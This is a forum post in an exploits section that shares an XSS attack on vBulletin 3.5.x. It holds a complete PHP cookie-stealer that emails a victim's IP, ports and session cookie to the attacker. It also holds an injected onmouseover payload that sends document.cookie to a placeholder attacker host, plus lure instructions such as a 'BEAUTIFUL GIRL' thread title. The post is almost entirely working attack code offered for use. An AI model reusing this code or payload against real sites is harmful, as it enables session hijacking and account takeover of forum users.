Jump to content
zolidznake

Vbulletin 3.5.x xpl (test3.5.4.)

By zolidznake, in Exploituri

Recommended Posts

zolidznake Newbie

zolidznake

Posted
Posted

________________________________________________________________________

/

,, / /

'-.`()/`.-'

.--_'( )'_--.

/ /` /`""` `

| | >< | |

/ /

'.__.'

=> Xss Vbulletin 3.5.x ( test: 3.5.4 )

=> Author: SpiderZ

=> Sito:

_________________________________________________________________________

('>http://www.spiderz.tk

_________________________________________________________________________

( 1 )

--------------------------------------------------------------------

Name file: exploit.php

--------------------------------------------------------------------

<?php

$ip_adresse = $_SERVER['REMOTE_ADDR'];

if(!empty($ip_adresse))

{

echo 'il tuo ip ?: ',$ip_adresse;

}

else

{

echo 'Impossible d'afficher l'IP';

}

?>

<?

$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];

$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());

if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;

else $visitor_info = $REMOTE_HOST;

$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;

$x1=`host $REMOTE_ADDR|grep Name`;

$x2=$REMOTE_PORT;

?>

<?php

$cookie = $_GET['c'];

?>

<?php

$myemail = "YOUR ADDRESS E-MAIL";

$today = date("l, F j, Y, g:i a") ;

$subject = "Xss Vbulletin" ;

$message = "Xss: Hacking

Ip: $ip_adresse

Cookie: $cookie

Url: $base

porta usata: $xx1

remote port: $x2

Giorno & Ora : $today n

";

$from = "From: $myemailrn";

mail($myemail, $subject, $message, $from);

?>

--------------------------------------------------------------------

<?php

$myemail = "YOUR ADDRESS E-MAIL";

--------------------------------------------------------------------

( 2 )

--------------------------------------------------------------------

Name file: image.gif

--------------------------------------------------------------------

<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >

--------------------------------------------------------------------

location="http://YOUR ADDRESS WEB.com

--------------------------------------------------------------------

( 3 )

--------------------------------------------------------------------

Like Using

--------------------------------------------------------------------

1? new thread

2? BEAUTIFUL GIRL '

3? Submit

4? It waits for

--------------------------------------------------------------------

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...